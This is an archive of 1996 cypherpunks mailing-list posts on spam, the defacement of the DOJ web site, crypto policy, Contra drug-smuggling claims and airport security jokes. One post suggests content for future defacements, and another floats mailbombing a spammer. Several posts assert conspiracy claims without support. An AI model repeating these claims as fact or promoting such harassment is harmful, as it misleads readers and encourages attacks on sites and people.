>well.  (Broadcasting & Cable 12 Aug 96 p86)

[...]

>Edupage is written by John Gehl <gehl@educom.edu> & Suzanne Douglas
><douglas@educom.edu>.  Voice:  404-371-1853, Fax: 404-371-8057.

>Technical support is provided by Information Technology Services at the
>University of North Carolina at Chapel Hill.

>***************************************************************
>Edupage ... is what you've just finished reading.  To subscribe to Edupage:
>send mail to: listproc@educom.unc.edu with the message:  subscribe edupage
>Charles Baudelaire (if your name is Charles Baudelaire;  otherwise,
>substitute your own name).  ...  To cancel, send a message to:
>listproc@educom.unc.edu with the message: unsubscribe edupage.   (If you
>have subscription problems, send mail to manager@educom.unc.edu.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 21 Aug 1996 16:56:33 +0800
To: cypherpunks@toad.com
Subject: Re: Spamming (Good or Bad?)
Message-ID: <ae3ff85d0b02100490f2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:16 AM 8/21/96, Paul S. Penrod wrote:
>On Tue, 20 Aug 1996, Ross Wright wrote:

>> Market Droids????  As a salesman I take offence at this slur.

Sales droids are subservient to market droids...sort of like R2D2, a sales
droid, getting his marching orders from C3PO, a market droid.


>As for spamming, I get enough of it via snail-mail, I don't want to see
>it in my Inbox too. And, for the record, there are lots of people out
>there who pay on the bulk charge, not by time. Sending advertising or
>junk mail to these folks costs them money, maybe not much for the one
>message you sent, but several thousand over a month of a quarter add up
>to real money.
>
>There is a time and place for legitimate advertising. I am sure that
>given time and impetus, a number of clear channel venues will open up to
>allow precision marketing and sales to happen electronicly.
>
>At the moment, it's bad nettiquette...

The basic problem is that, unlike paper mail, it costs a sender essentially
nothing to send nearly any size file to as many people as he wishes. This
is the basic economic fact of the Net at this time. Until this eventually
changes, spamming will be with us.

(I understand experts in the field of "spamming" have various names for
various flavors: spam, velveeta, jerky, etc. I'll call them all "unwanted
messages.")

The problem is one of economics and allocation of costs. Other industries
have the same issues:

* fax machines: costs of paper are borne by receiver, leading to high bills
when "junk faxes" are received (and hence some laws restricting such faxes)

* cellular phones: receiver of calls usually is charged air time. Thus,
"junk calls" cost money.

(My physical mailbox probably gets about $1 a day of junk mail, in terms of
postage paid. More, in terms of costs to print catalogs, fliers, freebies,
etc. It takes me about 20 seconds, tops, to decide what to discard
immediately and what to save, so at this point "their costs" > "my costs.")

In my view, attempting to legislate what is "junk" and what is not junk is
misguided. (And I suspect it rarely works in halting junk mail.) Junk is in
the eye of the beholder.

There are technological fixes which I would favor over attempts to ban
unwanted messages.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Wed, 21 Aug 1996 16:41:23 +0800
To: "cypherpunks" <ac@twinds.com>
Subject: Re: Post Office restrictions
Message-ID: <19960821062923375.AAA66@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 19 Aug 1996 10:18:42 -0400 (EDT"), Arley Carter wrote:

>> I've told some people about a few of the loopholes mentioned on the list
>> about the new post office restrictions on airmail packages.  What's
>> disturbing is that none of the people I'd talked to, all of whom are
>> at least reasonably intelligent, had thought or heard, for instance,
>> that PanAm103 only took 12 ounces or that someone could just send two
>> packages.  How does the news media justify its existence? (Down here, it
>> seems to be serving as a propaganda arm for the Republicans)
>                                                  ************
>
>Where are you that the news media serves as a lapdog for the Republicans?
>The local media, esp. the print media around here, Winston-Salem, NC
>leans so far to the left the letters fall off the page when you up the 
>newspaper. :-)

I'm talking about the San Diego Union-Tribune, the paper that posted huge
billboard welcoming the RNC around the area, the paper that paid for the
biggest fireworks display ever west of the miss, the paper that had a
6-20 page RNC insert daily, the paper that "spammed" the opinions page
with pro-RNC articles.  Are we starting to see what's it like? By the
end, I was something like "I don't care if Bob Dole gets raped to death
by a donkey, I don't want to hear about it!"

>As for the national media, esp. the (C)linton (N)ews (N)etwork, need I 
>say more?
Agreed

|Home: Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
|Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
|Work: cadams@acucobol.com | V.M. (619)515-4894 | (619)689-6579
|AcuCOBOL-85: Migrate the easy way - 100% legacy compatible, 
|easy GUI, ODBC, 650+ platforms w/o recompiling (like Java).


 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <liberty@gate.net>
Date: Wed, 21 Aug 1996 14:04:03 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE]CIA Contra Crack and LA Gangs (fwd)
Message-ID: <199608210335.XAA87778@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Tue Aug 20 23:34:46 1996
OK, Rich cites a loon, but the fact is that Southern Air Transport 
right here in Miami was in there early in the contraarms-coke 
trade. You don't make the real money in any transport business 
unless you can have full loads both ways. Also, the skills needed 
to land an overloaded airplane on an unimproved strip are different 
than those held by typical pilots, even very good, carrier-rated 
military pilots. Drugsmugglers had 'em, nobody else did, the CIA 
needed pilots with the skills to have their filthy little war. You 
can search the "major papers" libraries of West & Lexis for:
"mena /p cocaine" and find all kinds of stuff. You can look into 
the case of John Hall's ranch in Costa Rica and find all kinds of 
stuff, too. The best experiment I've run across is to ask anyone 
(especially anyone under 30, for some reason) the following:
"Do you think those planes came back empty?" When I do this, _I_ 
don't have to say the word "cocaine," they say it for me. Every 
time. It is a major, bipartisan, Watergate-style but bigger 
scandal, and the strange bedfellows in the media who were doing a 
halfway decent job of covering it [The Wall Street Journal and 
"High Times" magazine(!)] have fallen strangely silent on the 
subject as the election approaches. Hmmmmm.
JMR




Regards, Jim Ray -- DNRC Minister of Encryption Advocacy

"'Filegate' is starting to make _Ed_ _Meese_ look ethical."
 -- me
 Defeat the Duopoly! Vote "NOTA," not Slick/Dull in November.
 Harry Browne for President. Jo Jorgensen for Vice-president.
 http://www.HarryBrowne96.org/
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
<mailto:liberty@gate.net> http://www.shopmiami.com/prs/jimray 
Coming
soon, the "Pennies For Perot" page. Keep billionaires off welfare!
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMhqD221lp8bpvW01AQF1SwP+JOEoKPgIeFD5EEMMj+psfRaAZHoA+yzC
ntVGjl22ThuqwyUJbbhmNEEP2+/mcGd4D1AWvs2Q0yFwWRyQybGGlnTyXtNNVY8s
rY4pHCtkUftOxD9oxpB7FSaN2giZzYohbd3bduet1kO6DoXRRHxFq8F/4rbAZbA/
WnRbDSfblUQ=
=WDGI
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 21 Aug 1996 17:26:44 +0800
To: cypherpunks@toad.com
Subject: Re: Husband/Wife jailed for saying Clinton Sucks
Message-ID: <ae3ffd5a0c021004bce5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:32 AM 8/21/96, Z.B. wrote:

>Published in Washington, D.C.   July 9, 1996
>Insult to Clinton leads to 2 arrests
>
>------------------------------------------------------
>By Ruth Larson
>THE WASHINGTON TIMES
>------------------------------------------------------
>[A] Chicago-area couple were arrested on charges of
>    disorderly conduct and interrogated for more than
>12 hours last week, simply because the woman told
>President Clinton exactly what she thought of him.
>  Last Tuesday, Mr. Clinton made an impromptu stop at
>the "Taste of Chicago" festival in Grant Park at
>midafternoon.
>  According to her husband, Patricia Mendoza, angered
>and upset by the recent deaths of 19 U.S. airmen in
>Saudi Arabia, told the president, "You suck, and
>those boys died!"
...

Thanks for passing this on. So much for "free speech" in a formerly free
country.

I've modified my .sig yet again, to include the Verboten Phrase.

Clinton is truly looking like a power-mad fool. Still, I hope he wins in
November. (I want to see a real impeachment, as the Arkansas news continues
to come out.)

By the way, the case against Richard Jewell, "THE ATLANTA BOMBER!!!!,"
continues to crumble...the voice on the 911 call doesn't match his, he
couldn't have gotten to the phone at the time the call was made, and the
hordes of investigators who tore his apartment apart (and his cabin, and so
on) found no real evidence (just the "profile" evidence: some gun
magazines, a photo of him cradling an AR-15, his weight, and probably a
subscription to The Playboy Channel).

Further, experts point out that if Jewell was working with an accomplice
(to make the phone call), this blows all conventional theories of a
"would-be hero" out of the water: the last thing such a would-be hero wants
is an accomplice, who shares in the risk but gets none of the credit, and
who could turn him in.

Finally, even CNN is picking up the "CIA supplied drugs to L.A. gangs"
story that the "San Jose Mercury News" ran a few days ago. Nothing in this
story was a real surprise to me, as I listen occasionally to Dave Emory on
the radio. Emory is no raving lunatic, in my opinion (I've met him a couple
of times). The connections with the Mena, Arkansas airfield are of course
quite interesting.

--Tim May

Illegal speech if said to Herr Clinton: "You suck, and those boys died!"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 21 Aug 1996 17:16:50 +0800
To: cypherpunks@toad.com
Subject: Re: Hackers invade DOJ web site
Message-ID: <ae4001ef0d021004d083@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:17 AM 8/21/96, Alan Olsen wrote:

>One of the best comments I have seen (from another list) was:
>
>"These are the people who want us to escrow our encryption keys with them
>and yet they can't protect their own web site."
>
>I think this can be used as a very valid example as to why they are
>untrustworthy to be in charge of keeping anything private and/or protected,
>let alone private encryption keys.

Something for future hackers to think about adding in future attacks (*):


"Press HERE to access National Law Enforcement Master Key Database"

or

"Back Door"   (with some semi-realistic-looking computer files....)

or

"Click HERE to download confidential FBI dossiers on Clinton's political
enemies."

(with a few entries on leading Republicans and former White House
occupants, for verisimilitude)


In other words, the DOJ attack _could have_ made some much stronger points
than merely saying DOJ is linked to Hitler and pornography, etc.

(* I am not by these words _encouraging_ such hacks, at least not in any
active, conspiratorial, RICO sense.)

--Tim May

Illegal speech if said to Herr Clinton: "You suck, and those boys died!"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Wed, 21 Aug 1996 17:19:14 +0800
To: rich@c2.org>
Subject: Re: Spamming (Good or Bad?)
Message-ID: <199608210700.AAA10238@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On Or About 20 Aug 96, 23:12, Rich Graves wrote:

> > > So is mailbombing the motherfucker, or more productively,
> > > virtually picketing his ISP until they kick him off for net
> > > abuse
> > 
> > That is the kind of self righteous crap that gives me the
> > creeps!!!
> 
> Good. That's called deterrence.* The market decides.
> 
> >From your earlier message, though, describing the "spamming" you
> >do, I
> really don't see you as needing deterrence
<SNIP>
> indiscriminately. OTOH, if you really target your audience well,
> especially if a human and not a bot is in charge of selecting
> prospects, then I'd call that "cold calling,"  not "spamming."

Well, that's just the way I look at it.  But some people overreact...

> Unsolicited email is moderately annoying, but I don't think it's
> anything to complain about. I filter all mail from unknown addresses
> anyway. 
> 
> * - The cool thing about this kind of deterrence is, since you're
> only defending virtual turf, you can sabre-rattle to your heart's
> content without worrying about having to actually follow through.

I do enjoy a little of that from time to time.

Ross

===========
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Wed, 21 Aug 1996 17:25:25 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Fwd: Re: No Subject - Lesson in cracking (cryptoanalysis 001)
Message-ID: <19960821071500515.AAA190@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


==================BEGIN FORWARDED MESSAGE==================
>From: "Chris Adams" <adamsc@io-online.com>
>To: "Scottauge@aol.com" <Scottauge@aol.com>
>Date: Wed, 21 Aug 96 00:14:19 -0800
>Reply-To: "Chris Adams" <adamsc@io-online.com>
>Priority: Normal
>X-Mailer: Chris Adams's Registered PMMail 1.52 For OS/2
>MIME-Version: 1.0
>Content-Type: text/plain; charset="us-ascii"
>Content-Transfer-Encoding: 7bit
>Subject: Re: No Subject - Lesson in cracking (cryptoanalysis 001)
>

On Mon, 19 Aug 1996 19:34:07 -0400, Scottauge@aol.com wrote:

>In a message dated 96-08-19 05:44:34 EDT, you write:
>> SAMPLE MESSAGE: ("HAIL ERIS")
>"e" is a very popular letter, so is t and s.  Collect enough cypher text and
>ya just match frequency to frequency - a high number of 6's are replaced with
>an e, and so on down the line.

>Now we just start chunking up the peices according to spelling rules we know
>about - then with the help of a handy dandy spell checker like thing, when we
>get close to a word, we clump the chunks together.

>Actually, mixing your letters around helps cuz one needs to do a lot of
>shuffling here - but believe me, algorithms are out there.  Plus, the more
>cipher text you provide, the easier it is to nab your info cuz there is >more
>information for the particular algorithm I'm thinking of to work with.

Okay wise guy.  I'm going to give you a 14300 character string that
starts
out
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE

EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETTTTTTTTTTTTTTTTTTTTTTTTTTT

TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT

TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT

TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO

OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO. . .

How are you going to tell *what* I was talking about?  I guaruntee with
any message of practical length (i.e. not " ckosuuy") will have multiple
possibilities, particularly when you take things like mispellings,
software artifacts ("----- BEGIN PGP --------" "X-Received ..." etc.) and
deliberate attempts to throw you off.  That's why it's unbreakable - by
anyone!

|Home: Chris Adams <adamsc@io-online.com> |
http://www.io-online.com/adamsc/adamsc.htp
|Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
|Work: cadams@acucobol.com | V.M. (619)515-4894 | (619)689-6579
| Member in good standing of the GNU whirled hors d'oeuvre


===================END FORWARDED MESSAGE===================


|Home: Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
|Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
|Work: cadams@acucobol.com | V.M. (619)515-4894 | (619)689-6579
| Member in good standing of the GNU whirled hors d'oeuvre





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Wed, 21 Aug 1996 18:07:04 +0800
To: cypherpunks@toad.com
Subject: Re:PreRFD: comp.org.cypherpunks
Message-ID: <v02140b02ae40769e9ebb@[204.179.131.38]>
MIME-Version: 1.0
Content-Type: text/plain


qut@netcom.com (Skip) writes:
> The Subject: line says it all.
>
> My suggestion number #1:
>
> No moderation.

Suggestion 1 on how to diminish the feeble S/N ratio on cypherpunks:

        make it a newsgroup

Suggestion 2:

        make it an unmoderated newsgroup


I can think of nothing that would cause the remaining clue to flee faster
than a CP newsgroup in wide distribution (if it were gatewayed to the list)

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Wed, 21 Aug 1996 17:43:26 +0800
To: cypherpunks@toad.com
Subject: Re:Edited Edupage, 18 Aug 1996
Message-ID: <v02140b03ae4078d022b7@[204.179.131.38]>
MIME-Version: 1.0
Content-Type: text/plain


"E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU> writes:
>         Speaking of Net-in-Orbit (while distributed datahavens have their
> points, sometimes you'd prefer not to have a given chunk of data on your
> hard drive - even encrypted with a passphrase), what's the physical setup
> for rewriteable optical drives? Are there any methods of doing those that
> will work OK in orbit?

You want to avoid moving parts like the plague in orbit.  They eventually
wear out or fail and once that happens you have a very expensive piece of
junk in orbit.  Solid-state storage is the _only_ way to go if you want to
avoid things like neding to pressurize the drive (eliminating any cost
advantage over solid-state.)  Its not like you can go up to swap a dead drive
out you know...

The big problem with orbiting datahavens is the cost.  Access requires going
to a commercial launching agency (approx $100K cost to put a smallsat in
LEO.)  The smallsat itself is relatively cheap at $25K.  Then multiply that
by 30 because with LEO (you will not get a GEO slot, ever) you will need a
swarm of sats to provide constant coverage; the orbit the sats are in means
that they are only overhead for minutes at a time.  When you add all of this
up it begins to make the idea of buying an old tanker or fish processing boat
pretty cost effective.
The big problem is that no one has data that is worth protecting enough to
make such a venture pay off.

jim







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P. J. Ponder" <ponder@freenet.tlh.fl.us>
Date: Wed, 21 Aug 1996 15:16:50 +0800
To: cypherpunks@toad.com
Subject: Re: Hackers invade DOJ web site
Message-ID: <Pine.OSF.3.91.960820222151.2689B-100000@fn3.freenet.tlh.fl.us>
MIME-Version: 1.0
Content-Type: text/plain


keywords: Crypto-policy, digital signatures, Anti-Horsemen,
          secure-DNS, DOJ-web-prank, Ayn Rand, hydrazine          

Will Day <willday@rom.oit.gatech.edu> responed to Frank Stuart's
cogent and insightful posting on the DOJ hack and a possibility
of using the tawdry event to some advantage....  If you missed Frank 
Stuart's original message, much of it is in Will Day's response.

I have made some tedious reformatting here with prepended 'Day' and 
'FS' marks to separate the two and clipped some ephemeral lines. Will 
Day signed his message with Pretty Good Privacy, but I clipped the 
signature from that off, also, having already hosed it up with my 
editing of line lengths, &c., so that you couldn't check it anyway,
even if you wanted to.

The gist of Will Day's question is how can an argument be made that 
supports the greater availability of strong crypto from the fact that 
someone swapped spoofed-up (and inane) pages for the DOJ's own on the 
DOJ's own web site?

Let's start by trying to imagine a future world of geodesic networks
based on robust strong protocols that are ubiquitous, easy to use, and
embedded in the chips of even the most mundane devices.  In this world,
authentication of data, such as web pages, is required (or at least it
could be) for every packet we receive.  For data retrieved from remote
sites we may require multiple signatures, and certificates signed by
someone in whom we have placed a high reputation value. 

When (or if) freely available legal authentication technology becomes
ubiquitous and transparent, we will be able to use it for even low
risk, trivial, applications - like remote controls for televisions. 

We sure as hell won't have to stay up at night worrying that some punk
is going to change any of the bits on our web server and that such
changes might go undetected by our code-signed auto-gunsel.

We are a long way from crypto-Chaumian-utopia, and it appears as 
though the US federal government wants to make it harder for us to get 
there.  (As an aside, I think the Clinton administration gets more of 
the blame for this than they should, since it was entrenched policy 
before they got out of Arkansas.  I think the roots of Clipper and GAK 
are back in Reagan's stint, about the time of NSDD 145. But then, the 
current leaders aren't doing much to develop meaningful *public* 
cryptography policy, so they have to take the heat now.)

Strong crypto helps people protect what is theirs.  That is part of 
what Frank Stuart is saying, and he's right.  That is a good point, 
and it deserves some attention.  Strong crypto can help big powerful 
organizations like the DOJ, and it can help regular folks, too.

Frank Stuart's next point is a beauty - at least the DOJ site that was 
attacked didn't have copies of everyone's secret keys stored on it.  
We all may know that even if GAK were ever passed, no one would be 
stupid enough to store the keys on a web server sitting out on the big 
bad Internet, but the cleverness of this spin-vector is that it raises 
the issue of GAK-riskiness in the context of DOJ's computer security. 

The last point is that another law on the books isn't needed, and 
wouldn't be effective anyway.

I have gone on way too long already, but to sum up, the DOJ being 
abused may serve to help the cause, if the proper angle can be seen - 
and Frank Stuart is off to a good start.  The specific answer to Will 
Day's question, which is a good one - how does crytpo protect your 
poor little Linux box in the corner that serves up web pages? -
is left up to the student as an exercise. 
--

Day>A short time ago, at a computer terminal far, far away, Frank Stuart 
Day>wrote:

FS> however, I think those in a position to do so should start with 
FS> the spin control.  Some suggestions:
FS>
FS>   The fact that even the U.S. Justice Department is unable to 
FS> adequately  protect it's own site from intruders underscores the 
FS> need for widely-available strong encryption.
FS>
FS>   While this is certainly a major embarrassment for the Justice 
FS> Department, at least the mandatory "key escrow" program the Clinton
FS> administration is insisting upon has not yet been implemented; 
FS> no private citizens' data appears to have been compromised this time.
FS>
FS>   It's doubtful that a new law or government bureaucracy would have 
FS> prevented this from happening but it's entirely possible that tools 
FS> such as strong encryption could have.  It's ironic that the U.S. 
FS> Government is focusing on the former while fighting use of the latter.

Day> I understand how it affects their claim for the security of escrowed
Day> keys, but I'm afraid I don't follow the other argument.  How would
Day> the wide availability of strong encryption have helped prevent the
Day> breakin?  How would encryption in general prevent breakins?  I'd 
Day> love to use this as an argument for strong encryption, but I 
Day> don't see how it really applies.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 21 Aug 1996 18:11:44 +0800
To: Jim Ray <liberty@gate.net>
Subject: Re: [NOISE]CIA Contra Crack and LA Gangs (fwd)
In-Reply-To: <199608210335.XAA87778@osceola.gate.net>
Message-ID: <Pine.GUL.3.95.960821002948.14190A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 20 Aug 1996, Jim Ray wrote:

> OK, Rich cites a loon, but the fact is that Southern Air Transport 
> right here in Miami was in there early in the contraarms-coke 
> trade.

Oh, I don't think it's impossible or even unlikely that at least some of the
groups lumped together as "contras" were involved in drug smuggling, and I
think it's reasonable to have different views regarding how much money was
involved and who knew what when (my view is very little, and medium). What I
object to are conspiracy theories along the lines of: 

1. The Reagan Administration used the Contras to smuggle crack to the US in
   a deliberate attempt at genocide against Black people. (I heard this a
   lot, though seldom in so many words, on KPFK in the mid-80's; the SJ Merc
   series certainly has this as a subtext.)
2. Clinton was a CIA agent involved in the Contra drug-smuggling CaBaL. He
   was involved in anti-war protests only as a CIA informant. (This is the
   suggestion of the Morris book.)
3. Anything involving the Kennedy assassination, Donna Rice, or Elvis.

> It is a major, bipartisan, Watergate-style but bigger 
> scandal, and the strange bedfellows in the media who were doing a 
> halfway decent job of covering it [The Wall Street Journal and 
> "High Times" magazine(!)] have fallen strangely silent on the 
> subject as the election approaches. Hmmmmm.

4. Anything where vague unsupported asserions are thrown out, followed by
   a Hmmmmm (sorry).

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Wed, 21 Aug 1996 21:31:22 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: Canada Imprisons People For Human Rights Activity
In-Reply-To: <199608210012.RAA11460@netcom.netcom.com>
Message-ID: <Pine.GUL.3.95.960821015840.14190B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Skippy the Mad Troller <qut@netcom.com> Bcc'd to cypherpunks:

> Liar, you support imprisoning and deporting people based purely on their 
> political ideas, such as the bile your mouth puked up all over the net this
> whole year.  Re: Ernst Zndel and his years of imprisonment by a court 
> for merely expressing his racist ideas, racist political ideas being 
> strictly illegal in Canada, hell everywhere in the so called white world 
> except for the USA, so far.

Point of fact: since he came to Canada, Zundel has spent a total of 4 1/2
*days* in minimum-security lockup. The other seven errors in the paragraph
above aren't worth responding to. 

For further, totally off-topic reading on Skippy and me, see:

 http://www.nizkor.org/ftp.cgi?people/h/harman.david
 http://www.nizkor.org/ftp.cgi?people/nyms/an572010
 http://www.nizkor.org/ftp.cgi?people/g/graves.rich
 http://www.stanford.edu/~ajg/project.html

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nathan poznick <npoznick@Harding.edu>
Date: Wed, 21 Aug 1996 17:16:58 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: [NOISE] Airport legal question
In-Reply-To: <Pine.3.89.9608201919.A23972-0100000@netcom14.Harding.edu>
Message-ID: <Pine.SOL.3.94.960821020451.6102A-100000@taz>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 20 Aug 1996, Lucky Green wrote:

> I know that it is a violation of federal law to joke about explosives at 
> the X-ray machine. Would an "I love Explosives" sticker on carry-on 
> luggage violate any laws?

i'm not sure about any specific laws, but i know the airlines take *any*
talk of explosives VERY seriously...

a few years back, while i was in high school, i was on an airplane with
about 15 other students, returning from an excursion...
one of the other students said something to the effect of, "oh sure...yea,
my cd player is really just a clever bomb in disguise.."
one of the flight attendants overheard him say this, (to another student)
and he was promptly taken to the front of the plane and restrained...they
actually took his cd player apart to make sure there were no explosives in
it...the only thing that stopped them from pressing criminal charges was
the fact that all of the adult sponsor on the trip vouched for him and
pleaded with the flight crew that he was just kidding...

he got off with a SEVERE talking to and a cd player in less-than perfect
condition...

nate.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^		             Nathan Poznick				 ^
^	        	 <npoznick@harding.edu>				 ^
^                    http://www.harding.edu/~npoznick			 ^
^									 ^
^                  "640k should be enough for anybody."			 ^
^									 ^
^		          --Bill Gates, 1981--				 ^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Wed, 21 Aug 1996 21:50:44 +0800
To: cypherpunks@toad.com
Subject: Re: Husband/Wife jailed for saying Clinton Sucks
In-Reply-To: <Pine.3.89.9608202214.A15288-0100000@netcom18>
Message-ID: <Pine.GUL.3.95.960821021046.14190C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 20 Aug 1996, Z.B. wrote:

> Published in Washington, D.C.   July 9, 1996
> Insult to Clinton leads to 2 arrests
> 
> ------------------------------------------------------
> By Ruth Larson
> THE WASHINGTON TIMES
> ------------------------------------------------------

I think you should try a more credible paper. Say, Scientology's Freedom
Magazine, rather than the Moonies'. You are of course free to believe
whatever you wish.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 21 Aug 1996 17:36:01 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: [NOISE] Airport legal question
In-Reply-To: <Pine.3.89.9608201919.A23972-0100000@netcom14>
Message-ID: <Pine.SUN.3.94.960821031541.26352A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 20 Aug 1996, Lucky Green wrote:

> I know that it is a violation of federal law to joke about explosives at 
> the X-ray machine. Would an "I love Explosives" sticker on carry-on 
> luggage violate any laws?

Yes.

The laws are intended to prevent any behavior which may reasonably create
apprehension that a threat to a commercial airline exists.

You're in for trouble if you put that sticker on your luggage.

I'll quote the language if there is enough interest.

> 
> TIA,
> 
> 
> 
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <vipul@pobox.com>
Date: Wed, 21 Aug 1996 09:21:55 +0800
To: willday@rom.oit.gatech.edu
Subject: Re: Hackers invade DOJ web site
In-Reply-To: <199608201554.LAA04383@rom.oit.gatech.edu>
Message-ID: <199608210329.DAA00542@fountainhead.net>
MIME-Version: 1.0
Content-Type: text


> A short time ago, at a computer terminal far, far away, Frank Stuart wrote:
> >however, I think those in a position to do so should start with the spin
> >control.  Some suggestions:
> >
> >   The fact that even the U.S. Justice Department is unable to adequately
> >   protect it's own site from intruders underscores the need for widely-
> >   available strong encryption.
> >
> >   While this is certainly a major embarrassment for the Justice Department,
> >   at least the mandatory "key escrow" program the Clinton administration is
> >   insisting upon has not yet been implemented; no private citizens' data
> >   appears to have been compromised this time.
> >
> >   It's doubtful that a new law or government bureaucracy would have prevented
> >   this from happening but it's entirely possible that tools such as strong
> >   encryption could have.  It's ironic that the U.S. Government is focusing on
> >   the former while fighting use of the latter.
> 
> I understand how it affects their claim for the security of escrowed
> keys, but I'm afraid I don't follow the other argument.  How would the
> wide availability of strong encryption have helped prevent the breakin?
> How would encryption in general prevent breakins?  I'd love to use this
> as an argument for strong encryption, but I don't see how it really
> applies.

I think its a DOJ's doing. They prolly want to show the courts how
bad hackers can get so they can conjure up some support in forthcomming
trials. C'mon the sysadmins aren't fools, they surely see their own site.

- Vipul
vipul@pobox.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Miskell <DMiskell@envirolink.org>
Date: Wed, 21 Aug 1996 18:06:37 +0800
To: rwright@adnetsol.com
Subject: Re: Spamming (Good or Bad?)
Message-ID: <199608210735.DAA27966@envirolink.org>
